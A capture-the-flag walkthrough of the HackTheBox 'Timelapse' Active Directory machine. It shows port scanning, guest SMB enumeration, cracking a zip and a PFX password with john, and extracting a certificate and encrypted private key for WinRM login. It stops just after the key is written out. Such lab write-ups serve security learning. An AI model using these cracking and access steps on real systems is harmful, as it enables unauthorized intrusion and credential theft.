Timelapse

AD box on HTB.

Enumeration:

Nmap:

As always we are going to start with port scanning:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Timelapse]                                                                                                                     
└─$ sudo nmap -sCV -p- --min-rate 4000 -oN nmap/services.nmap -vv 10.129.227.113
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-06 02:08 EDT
Nmap scan report for 10.129.227.113                                                   
Host is up, received echo-reply ttl 127 (0.13s latency).                              
Scanned at 2025-09-06 02:08:24 EDT for 243s                                           
Not shown: 65517 filtered tcp ports (no-response)                                     
PORT      STATE SERVICE           REASON          VERSION                             
53/tcp    open  domain            syn-ack ttl 127 Simple DNS Plus                     
88/tcp    open  kerberos-sec      syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-06 14:09:20Z)                                                            
135/tcp   open  msrpc             syn-ack ttl 127 Microsoft Windows RPC               
139/tcp   open  netbios-ssn       syn-ack ttl 127 Microsoft Windows netbios-ssn       
389/tcp   open  ldap              syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)                          
445/tcp   open  microsoft-ds?     syn-ack ttl 127                                     
464/tcp   open  kpasswd5?         syn-ack ttl 127                                     
593/tcp   open  ncacn_http        syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0                                                                                       
636/tcp   open  ldapssl?          syn-ack ttl 127                                     
3268/tcp  open  ldap              syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)                          
3269/tcp  open  globalcatLDAPssl? syn-ack ttl 127                                     
5986/tcp  open  ssl/http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                   
|_http-title: Not Found                                                               
| tls-alpn:                                                                           
|_  http/1.1                                                                          
|_ssl-date: TLS randomness does not represent time                                    
| ssl-cert: Subject: commonName=dc01.timelapse.htb                                    
| Issuer: commonName=dc01.timelapse.htb                                               
| Public Key type: rsa                                                                
| Public Key bits: 2048                                                               
| Signature Algorithm: sha256WithRSAEncryption                                        
| Not valid before: 2021-10-25T14:05:29                                               
| Not valid after:  2022-10-25T14:25:29                                               
| MD5:   e233:a199:4504:0859:013f:b9c5:e4f6:91c3                                      
| SHA-1: 5861:acf7:76b8:703f:d01e:e25d:fc7c:9952:a447:7652                            
| -----BEGIN CERTIFICATE-----                                                                                                                                               
| MIIDCjCCAfKgAwIBAgIQLRY/feXALoZCPZtUeyiC4DANBgkqhkiG9w0BAQsFADAd                    
| MRswGQYDVQQDDBJkYzAxLnRpbWVsYXBzZS5odGIwHhcNMjExMDI1MTQwNTI5WhcN                                                                                                          
| MjIxMDI1MTQyNTI5WjAdMRswGQYDVQQDDBJkYzAxLnRpbWVsYXBzZS5odGIwggEi                                                                                                          
| MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDJdoIQMYt47skzf17SI7M8jubO                    
| rD6sHg8yZw0YXKumOd5zofcSBPHfC1d/jtcHjGSsc5dQQ66qnlwdlOvifNW/KcaX                    
| LqNmzjhwL49UGUw0MAMPAyi1hcYP6LG0dkU84zNuoNMprMpzya3+aU1u7YpQ6Dui
| AzNKPa+6zJzPSMkg/TlUuSN4LjnSgIV6xKBc1qhVYDEyTUsHZUgkIYtN0+zvwpU5                    
| isiwyp9M4RYZbxe0xecW39hfTvec++94VYkH4uO+ITtpmZ5OVvWOCpqagznTSXTg                    
| FFuSYQTSjqYDwxPXHTK+/GAlq3uUWQYGdNeVMEZt+8EIEmyL4i4ToPkqjPF1AgMB                    
| AAGjRjBEMA4GA1UdDwEB/wQEAwIFoDATBgNVHSUEDDAKBggrBgEFBQcDATAdBgNV                    
| HQ4EFgQUZ6PTTN1pEmDFD6YXfQ1tfTnXde0wDQYJKoZIhvcNAQELBQADggEBAL2Y                    
| /57FBUBLqUKZKp+P0vtbUAD0+J7bg4m/1tAHcN6Cf89KwRSkRLdq++RWaQk9CKIU                    
| 4g3M3stTWCnMf1CgXax+WeuTpzGmITLeVA6L8I2FaIgNdFVQGIG1nAn1UpYueR/H                    
| NTIVjMPA93XR1JLsW601WV6eUI/q7t6e52sAADECjsnG1p37NjNbmTwHabrUVjBK                    
| 6Luol+v2QtqP6nY4DRH+XSk6xDaxjfwd5qN7DvSpdoz09+2ffrFuQkxxs6Pp8bQE                    
| 5GJ+aSfE+xua2vpYyyGxO0Or1J2YA1CXMijise2tp+m9JBQ1wJ2suUS2wGv1Tvyh                    
| lrrndm32+d0YeP/wb8E=                     
|_-----END CERTIFICATE-----                
9389/tcp  open  mc-nmf            syn-ack ttl 127 .NET Message Framing                
<snipped>           
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>
|_clock-skew: 7h59m59s
<snipped>

We are dealing with another active directory machine, but this time we can see WinRM running on port 5986 which is WinRM over SSL.

Also we can find the FQDN, so I will add to the hosts file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Timelapse]                                                                                                                     
└─$ cat /etc/hosts                                                                                                                                                          
127.0.0.1       localhost                                                                                                                                                   
127.0.1.1       kali                                                                                                                                                        
<snipped>                                                                                                                     
                                                                                                                                                                            
10.129.227.113 DC01.timelapse.htb timelapse.htb DC01

Enumerate the shares:

First we will start by enumeration the shares with netexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Timelapse]                               
└─$ netexec smb 10.129.227.113 -u 'guest' -p '' --shares                              
SMB         10.129.227.113  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)            
SMB         10.129.227.113  445    DC01             [+] timelapse.htb\guest:          
SMB         10.129.227.113  445    DC01             [*] Enumerated shares             
SMB         10.129.227.113  445    DC01             Share           Permissions     Remark                                                                                  
SMB         10.129.227.113  445    DC01             -----           -----------     ------                                                                                  
SMB         10.129.227.113  445    DC01             ADMIN$                          Remote Admin                                                                            
SMB         10.129.227.113  445    DC01             C$                              Default share                                                                           
SMB         10.129.227.113  445    DC01             IPC$            READ            Remote IPC                                                                              
SMB         10.129.227.113  445    DC01             NETLOGON                        Logon server share                                                                      
SMB         10.129.227.113  445    DC01             Shares          READ              
SMB         10.129.227.113  445    DC01             SYSVOL                          Logon server share

We will see the guest user is enabled, and we have read permission over IPC$, and Shares shares.

This time I will use impacket-smbclient to authenticate and view those shares:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Timelapse]                                                                                                                     
└─$ impacket-smbclient timelapse.htb/guest@10.129.227.113 -no-pass                    
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies                                                                                                  
                                           
Type help for list of commands                                                        
# use Shares                               
# ls                                       
drw-rw-rw-          0  Mon Oct 25 11:55:14 2021 .                                     
drw-rw-rw-          0  Mon Oct 25 11:55:14 2021 ..                                    
drw-rw-rw-          0  Mon Oct 25 15:40:06 2021 Dev                                   
drw-rw-rw-          0  Mon Oct 25 11:55:14 2021 HelpDesk                              
# cd Dev                                   
# ls                                                                                  
drw-rw-rw-          0  Mon Oct 25 15:40:06 2021 .                                     
drw-rw-rw-          0  Mon Oct 25 15:40:06 2021 ..                                    
-rw-rw-rw-       2611  Mon Oct 25 17:05:30 2021 winrm_backup.zip                                                                                                            
# get winrm_backup.zip                                                                
# cd ..\HelpDesk                                            
# ls                                                                                  
drw-rw-rw-          0  Mon Oct 25 11:55:14 2021 .                                     
drw-rw-rw-          0  Mon Oct 25 11:55:14 2021 ..                                    
-rw-rw-rw-    1118208  Mon Oct 25 11:55:14 2021 LAPS.x64.msi                          
-rw-rw-rw-     104422  Mon Oct 25 11:55:14 2021 LAPS_Datasheet.docx                   
-rw-rw-rw-     641378  Mon Oct 25 11:55:14 2021 LAPS_OperationsGuide.docx             
-rw-rw-rw-      72683  Mon Oct 25 11:55:14 2021 LAPS_TechnicalSpecification.docx      
# mget *                                   
[*] Downloading LAPS.x64.msi                                                          
[*] Downloading LAPS_Datasheet.docx                                                   
[*] Downloading LAPS_OperationsGuide.docx                                             
[*] Downloading LAPS_TechnicalSpecification.docx                                      
# exit

We have two folders, the first one containing winrm_backup.zip file, and the other has LAPS word files and LAPS installer.

I opened the word files, and did not find anything useful, but maybe this is a hint just like the box name (timelapse), so maybe we will deal with laps to get some info.

If we tried to unzip the winrm_backup.zip:

┌──(kali㉿kali)-[~/…/HackTheBox/Timelapse/smb/winrm_backup]                                                                                                                 
└─$ 7z x ../winrm_backup.zip                                                                                                                                                
                                                                                                                                                                            
7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03                                                                                                        
 64-bit locale=en_US.UTF-8 Threads:6 OPEN_MAX:1024, ASM                                                                                                                     
                                                                                                                                                                            
Scanning the drive for archives:                                                                                                                                            
1 file, 2611 bytes (3 KiB)                                                                                                                                                  
                                                                                                                                                                            
Extracting archive: ../winrm_backup.zip                                                                                                                                     
--                                                                                                                                                                          
Path = ../winrm_backup.zip                                                                                                                                                  Type = zip                                                                                                                                                                  
Physical Size = 2611                                                                                                                                                        
                                                                                                                                                                            
                                                                                                                                                                            
Enter password (will not be echoed):                                                                                                                                        
ERROR: Wrong password : legacyy_dev_auth.pfx                                                                                                                                
                                                                                                                                                                            
Sub items Errors: 1                                                                                                                                                         
                                                                                                                                                                            
Archives with Errors: 1                                                                                                                                                     
                                                                                                                                                                            
Sub items Errors: 1

We will see that it is protected with a password.

Now the time for john the ripper to try to get the password of that zip file:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Timelapse/smb]                               
└─$ zip2john winrm_backup.zip > winrm_backup.hash                                     
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Timelapse/smb]                               
└─$ john winrm_backup.hash --wordlist=/usr/share/wordlists/rockyou.txt                
Using default input encoding: UTF-8        
Loaded 1 password hash (PKZIP [32/64])     
Will run 6 OpenMP threads                  
Press 'q' or Ctrl-C to abort, almost any other key for status                         
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)                              
1g 0:00:00:00 DONE (2025-09-06 02:13) 3.333g/s 11591Kp/s 11591Kc/s 11591KC/s surkerior..supalove                                                                            
Use the "--show" option to display all of the cracked passwords reliably              
Session completed.

We retrieved the password, I will use it to unzip the winrm_backup.zip file:

┌──(kali㉿kali)-[~/…/HackTheBox/Timelapse/smb/winrm_backup]                                                                                                                 
└─$ 7z x ../winrm_backup.zip                                                                                                                                                
                                                                                                                                                                            
7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03                                                                                                        
 64-bit locale=en_US.UTF-8 Threads:6 OPEN_MAX:1024, ASM                                                                                                                     
                                                                                                                                                                            
Scanning the drive for archives:                                                                                                                                            
1 file, 2611 bytes (3 KiB)                                                                                                                                                  
                                                                                                                                                                            
Extracting archive: ../winrm_backup.zip                                                                                                                                     
--                                                                                                                                                                          
Path = ../winrm_backup.zip                                                                                                                                                  
Type = zip                                                                                                                                                                  
Physical Size = 2611                                                                                                                                                        
                                                                                                                                                                            
                                           
Would you like to replace the existing file:                                          
  Path:     ./legacyy_dev_auth.pfx         
  Size:     0 bytes                        
  Modified: 2021-10-25 10:21:20            
with the file from archive:                
  Path:     legacyy_dev_auth.pfx           
  Size:     2555 bytes (3 KiB)             
  Modified: 2021-10-25 10:21:20            
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? Y                

                                           
Enter password (will not be echoed):       
Everything is Ok                           

Size:       2555                           
Compressed: 2611

We will find that it contains only one file, called legaccy_dev_auth.pfx, which is a flie that can be used to establish secure communication, and it contains private key and a certificate and other stuff.

We can get more information off of it using openssl:

┌──(kali㉿kali)-[~/…/HackTheBox/Timelapse/smb/winrm_backup]
└─$ openssl x509 -in legacyy_dev_auth.pfx -text
Enter pass phrase for PKCS12 import pass phrase:
Could not find certificate from legacyy_dev_auth.pfx
406725076D7F0000:error:16000071:STORE routines:try_pkcs12:error verifying pkcs12 mac:../crypto/store/store_result.c:605:empty password

It is password-protected, so we will need to use john again to attempt get retrieve the password:

┌──(kali㉿kali)-[~/…/HackTheBox/Timelapse/smb/winrm_backup]                                                                                                                 
└─$ pfx2john legacyy_dev_auth.pfx > legacyy_dev_auth.hash

┌──(kali㉿kali)-[~/…/HackTheBox/Timelapse/smb/winrm_backup]                                                                                                                 
└─$ john legacyy_dev_auth.hash --wordlist=/usr/share/wordlists/rockyou.txt            
Using default input encoding: UTF-8        
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])  
Cost 1 (iteration count) is 2000 for all loaded hashes                                
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes                                                                           
Will run 6 OpenMP threads                  
Press 'q' or Ctrl-C to abort, almost any other key for status                         
thuglegacy       (legacyy_dev_auth.pfx)                                               
1g 0:00:00:47 DONE (2025-09-06 02:16) 0.02111g/s 68252p/s 68252c/s 68252C/s thugways..thsco04                                                                               
Use the "--show" option to display all of the cracked passwords reliably              
Session completed.

┌──(kali㉿kali)-[~/…/HackTheBox/Timelapse/smb/winrm_backup]
└─$ openssl x509 -in legacyy_dev_auth.pfx -text                                                                                                                             
Enter pass phrase for PKCS12 import pass phrase: thuglegacy                                                                                                                                  
Certificate:                                                                                                                                                                
    Data:                                                                                                                                                                   
        Version: 3 (0x2)                                                                                                                                                    
        Serial Number:                                                                                                                                                      
            1d:99:89:29:8a:cf:11:bb:41:93:a1:cf:f4:4e:12:df                                                                                                                 
        Signature Algorithm: sha256WithRSAEncryption                                                                                                                        
        Issuer: CN=Legacyy                                                                                                                                                  
        Validity                                                                                                                                                            
            Not Before: Oct 25 14:05:52 2021 GMT                                      
            Not After : Oct 25 14:15:52 2031 GMT                                      
        Subject: CN=Legacyy                                                           
        Subject Public Key Info:                                                                                                                                            
            Public Key Algorithm: rsaEncryption                                       
                Public-Key: (2048 bit)                                                                                                                                      
                Modulus:                                                              
                    00:a5:56:07:a3:62:16:47:1e:e2:f3:4d:23:ad:61:                                                                                                           
                    71:ce:8b:9e:b3:4a:87:2b:f6:89:bc:e7:86:03:bb:                                                                                                           
                    fe:aa:1c:16:b8:35:ff:31:14:fe:88:34:d0:4d:95:                                                                                                           
                    85:af:03:10:af:28:cf:1a:42:c1:e9:bf:7b:68:a7:
                    0a:50:f9:86:d1:64:3b:b5:37:1c:a1:bd:f3:4d:4d:                                                                                                           
                    15:e3:74:54:15:f6:72:22:2a:4a:30:3a:de:a0:1b:                                                                                                           
                    61:7e:f4:ee:60:54:5e:0f:02:71:cf:9b:e6:18:3f:                                                                                                           
                    0b:1b:a1:19:18:57:c4:0e:a7:32:22:e8:d3:19:80:                                                                                                           
                    30:89:ae:02:12:59:99:94:1e:a4:e1:c9:b1:56:ff:                                                                                                           
                    b3:ce:99:ed:60:b3:ab:62:37:55:c5:a0:fb:b5:cc:                                                                                                           
                    d3:98:68:82:f7:76:d6:5a:6b:35:dc:2f:0e:88:a5:                                                                                                           
                    32:51:3c:90:16:1a:db:6a:c8:5a:26:99:8a:c9:a8:                                                                                                           
                    2c:c2:49:a5:ae:f6:31:b4:a7:58:4a:2b:b9:a4:eb:                                                                                                           
                    0b:c1:49:1f:10:7c:75:b6:a9:7f:7e:35:b2:ca:7a:                                                                                                           
                    00:ad:fb:f8:c0:6b:ab:b6:57:d9:6e:f8:ad:cc:0b:                     
                    63:5a:4b:33:a8:22:2e:47:2c:c8:e7:ae:e8:d1:a0:                     
                    2c:77:bf:a6:57:2f:42:8f:08:5c:c3:30:4a:8b:14:                     
                    91:f1                                                                                                                                                   
                Exponent: 65537 (0x10001)                                             
        X509v3 extensions:                                                                                                                                                  
            X509v3 Key Usage: critical                                                
                Digital Signature, Key Encipherment                                                                                                                         
            X509v3 Extended Key Usage:                                                                                                                                      
                TLS Web Client Authentication                                                                                                                               
            X509v3 Subject Alternative Name:                                          
                othername: UPN:legacyy@timelapse.htb                                                                                                                        
            X509v3 Subject Key Identifier:                                                                                                                                  
                CC:D9:0E:E4:AF:20:9E:B0:75:2B:FD:81:96:1E:AC:2D:B1:25:58:19                                                                                                 
    Signature Algorithm: sha256WithRSAEncryption                                                                                                                            
    Signature Value:                                                                                                                                                        
        5f:8e:fb:76:bf:de:3e:fe:96:fd:da:72:c8:4b:8a:e7:6b:b0:                                                                                                              
        88:2a:ba:9a:9b:de:ba:1f:c9:05:ea:de:e9:1d:93:e5:10:36:                                                                                                              
        4c:af:5e:ee:e7:49:2f:4c:dd:43:e0:fb:65:0a:e7:7d:49:a3:                                                                                                              
        ec:a2:44:9b:28:da:05:81:7d:4a:35:7e:66:ef:61:74:dc:a0:                                                                                                              
        8b:22:68:75:cf:89:6d:c6:c7:3a:26:03:a0:9d:c0:aa:74:57:                                                                                                              
        d7:de:dd:04:cb:74:7b:28:6c:7a:ad:e2:ed:bd:4e:05:67:e9:                        
        e1:be:55:d3:78:9f:cf:01:77:3f:7f:06:b6:ad:f8:8f:b1:f5:                        
        79:d5:64:ce:60:4c:dc:82:99:e0:74:72:6d:06:a9:ae:37:0d:                        
        ed:9c:42:a6:80:ca:a9:eb:92:98:ce:92:93:be:f3:35:26:38:                                                                                                              
        48:e6:dc:46:86:a6:dd:59:b9:f6:95:2e:30:8c:6c:b7:60:64:                        
        59:c3:aa:0c:eb:ae:c6:17:5d:d5:ab:65:f7:58:76:4a:e4:d6:                                                                                                              
        8f:fb:92:9a:c1:df:c9:f8:cb:3a:ae:26:34:3c:36:e1:9f:1d:                        
        78:de:f2:22:a0:76:0c:88:60:a7:2a:c1:dd:5a:23:2b:1b:65:                                                                                                              
        16:2c:ea:1e:52:b9:54:9a:9a:f4:eb:d9:18:fe:79:fb:fb:34:                                                                                                              
        84:6b:6a:40                                                                                                                                                         
No Trusted Uses.
No Rejected Uses.                          
Key Id: 01:00:00:00                        
-----BEGIN CERTIFICATE-----                
MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS                      
MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1                      
MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC                      
AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0                      
0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb                      
YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z                      
7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72                      
MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs                      
yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg                      
MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX                      
DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe                      
rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa                      
m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0                      
3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/                      
fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG                      
hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh                      
nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA                              
-----END CERTIFICATE-----

┌──(kali㉿kali)-[~/…/HackTheBox/Timelapse/smb/winrm_backup]                                                                                             02:19:56 [1483/1764]
└─$ openssl pkcs12 -info -in legacyy_dev_auth.pfx                                                                                                                           
Enter Import Password: thuglegacy                                                                                                                                                     
MAC: sha1, Iteration 2000                                                                                                                                                   
MAC length: 20, salt length: 20                                                                                                                                             
PKCS7 Data                                                                                                                                                                  
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 2000                                                                                                           
Bag Attributes                                                                                                                                                              
    Microsoft Local Key set: <No Values>                                                                                                                                    
    localKeyID: 01 00 00 00                                                                                                                                                 
    friendlyName: te-4a534157-c8f1-4724-8db6-ed12f25c2a9b                                                                                                                   
    Microsoft CSP Name: Microsoft Software Key Storage Provider                                                                                                             
Key Attributes                                                                                                                                                              
    X509v3 Key Usage: 90                                                                                                                                                    
Enter PEM pass phrase:                                                                                                                                                      
Verifying - Enter PEM pass phrase:                                                                                                                                          
-----BEGIN ENCRYPTED PRIVATE KEY-----                                                                                                                                       
MIIFNTBfBgkqhkiG9w0BBQ0wUjAxBgkqhkiG9w0BBQwwJAQQVlnB18BtxY73ENiK                                                                                                            
M+fdhgICCAAwDAYIKoZIhvcNAgkFADAdBglghkgBZQMEASoEEGHBzdRmlH7HmGxY                                                                                                            
IPl8ayMEggTQXjpMtGGJkASVTR/SIt5xU101hdJyz7m3HVZbhKwHxkG/PWOptKDd                                                                                                            
JawwaJbmcqpmZqTU5scShbwyLqtnLjDnEGQyQ5y77hUvm3iqZmvC+ccto4cgbkHo                                                                                                            
ZHoaoUmNbkeJh+I4TmEhH8hD8lJUxPVIwnf36mTt5o9GJpjosaRVxt3Y0YyJ2CNP                                                                                                            
pjZZLmehqCv3Dw5IwVk4YlmYHXGMlWpsQ77EKZexG3mI+rQCcDMv+gWaL/2UkYY+                                                                                                            
PcShpc9+rEDrQ7sDr+w9sCH7oQ8OGUzWlZcVFEMNdGSZlsxDFGnJZMoHFDr4KPfd                                                                                                            
5o3fGNV6xNQHBL+Xl4Rl+Kk5e+9QBYXU96NHv7r+/9AZrRmbGgxdSXKYOQvVAw2Q                                                                                                            
mkT5z4seMTJ0dZVgP0LWnSaerWbIkrHjwHpwO+BDTZYQi09FWF/or69Q805avPCb                                                                                                            
gRN2CjYdF6xdsHgXv5VWtTJVqSrGhQFO27MjHEFzRgnafuJRcCwZnFTNeDPRmDtL                                                                                                            
3N4OtE5tMwH5qIAjum8uSgGMGxgS0CHvH2XHN1sCiMavUwfuw7C9Ur029eCgHhL+                                                                                                            
PxXNZgPqfyuyOl1NYs4LltTnDJNIoZQDiV3BUpwBpsH1sEDS3AM4ojv5DaBlWvCz                                                                                                            
i69gmpgAldMJ2nHD047f/lJrfDUZLlRJzMMVCprMMfzBnwSyBuu2EJnPoqPaZJ0n                                                                                                            
XuDmE+6tGqx6OJnKzuWAnY0k3NHkS9l4pLZP58GRLBY9neyjKu5kKj9qB5xJEaER                                                                                                            
rgS1RM0qACld2uZjo21Sen5h2yhZuUkCEDDb8vovHgO9md6RJ+IMp2RbxWXiI19P                                                                                                            
5y0R8roIUsWG3PXN+wmUQeMeg8xejYu6XtHV4M/2NapsV9uBLheFJ24WeNt1zZEb                                                                                                            
fExyCzDincoV+mhZf2rNs/4WBOAA3Nv17sC1I3Ad3qVOfVRedkaF7t9x/8ibERGI                                                                                                            
EvQb+KqSvGk9h/2T4lFtVjSV77Xb97GKy+7J8vFqFZQmK+bQoOnr9cnjAJyTO20P                                                                                                            
QICHUQGHvceP4e7BLTG9JopVur8XTb19afcc9Uxk4HOT4wCVa9j91vC7MeY2zFlL                      
9xotf9WLy+KNupbIa5Toewx0Br+0ykB1lvN6whPm11/FWzjKq5c8g7jg/S819f5c                      
KPISNceA4DO/cF8wdLxa2Mrn37grJIe7kly95Ox3Rwra9t/PbQsKC7ZPg1BnXKPN                      
T80kGZywLPQw2tRqq60ZLr2yePl+1ysy4uHrQwZFrdd8QRMqo8VzSCeUjKjuZLTf                      
6uNYlbXyf2/3XAM3QJHuwT8JZZ4V2ejuM9WMNYO3xqIvm19DAYbx6sPw9ptzoJ8P                      
4Y2+5hNv+6NdYDDx0DpTxSOCKt7z8l/cZW4+a/Qi0Xv9PmUmP6T0PpcLlaorGte3                      
TpDHzTCPbQAaACM/9iH/tF0F0qLZ2+uVUST3RI2pTO3vL7CH3WELbLQHk5xBruuE                      
YQUMkdCa3wagg/XClyHgSozOWwJikQoJecE6ZKERJ+ZsYTxTXxkicbOfckxYfAqd
5cOznaAkuoqX3SAOQeAtdhumjJrgi9Ymvl/8RIaWUWytCr8NAQkAwyikpArLR+8l                      
+tTchUl1bgSnYzlZR3tGtTLQ5XLtg+a1XRhWZMZtA6gQH2xUxR1Hpz8=                              
-----END ENCRYPTED PRIVATE KEY-----                                                   
PKCS7 Data                                                                            
Certificate bag                                                                       
Bag Attributes                                                                        
    localKeyID: 01 00 00 00                                                           
subject=CN=Legacyy                                                                                                                                                          
issuer=CN=Legacyy                                                                     
-----BEGIN CERTIFICATE-----                                                           
MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS                      
MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1                      
MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC                      
AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0                      
0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb                      
YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z                      
7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72                      
MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs                      
yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg                      
MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX                                                                                                            
DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe                      
rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa                      
m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0                                                                                                            
3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/                      
fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG                      
hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh                                                                                                            
nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA                              
-----END CERTIFICATE-----

We can see the certificate, the private key, and for whom this pfx was issued for (legacyy).

Now we can use multiple tools to see if this pfx is still valid pfx, and we can authenticate using it or not.

I will try evil-winrm first:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Timelapse]
└─$ evil-winrm --help                                                  
                                        
Evil-WinRM shell v3.7

Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-a USERAGENT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]
    -S, --ssl                        Enable ssl
    -a, --user-agent USERAGENT       Specify connection user-agent (default Microsoft WinRM Client)
    -c, --pub-key PUBLIC_KEY_PATH    Local path to public key certificate
    -k, --priv-key PRIVATE_KEY_PATH  Local path to private key certificate
    -r, --realm DOMAIN               Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
    -s, --scripts PS_SCRIPTS_PATH    Powershell scripts local path
        --spn SPN_PREFIX             SPN prefix for Kerberos auth (default HTTP)
    -e, --executables EXES_PATH      C# executables local path
    -i, --ip IP                      Remote host IP or hostname. FQDN for Kerberos auth (required)
    -U, --url URL                    Remote url endpoint (default /wsman)
    -u, --user USER                  Username (required if not using kerberos)
    -p, --password PASS              Password
    -H, --hash HASH                  NTHash
    -P, --port PORT                  Remote host port (default 5985)
    -V, --version                    Show version
    -n, --no-colors                  Disable colors
    -N, --no-rpath-completion        Disable remote path completion
    -l, --log                        Log the WinRM session
    -h, --help                       Display this help message

It does not support pfx files, but it support public (certificate) and private keys, so using openssl again we can dump the certificate to a file and the private key to a file:

┌──(kali㉿kali)-[~/…/HackTheBox/Timelapse/smb/winrm_backup]                                                                                                                 
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.key                                                                                                           
Enter Import Password: thuglegacy                                                                                                                                                     
Enter PEM pass phrase: obaida                                                                                                                                                     
Verifying - Enter PEM pass phrase: obaida

┌──(kali㉿kali)-[~/…/HackTheBox/Timelapse/smb/winrm_backup]                                                                                                                 
└─$ cat key.key                                                                                                                                                             
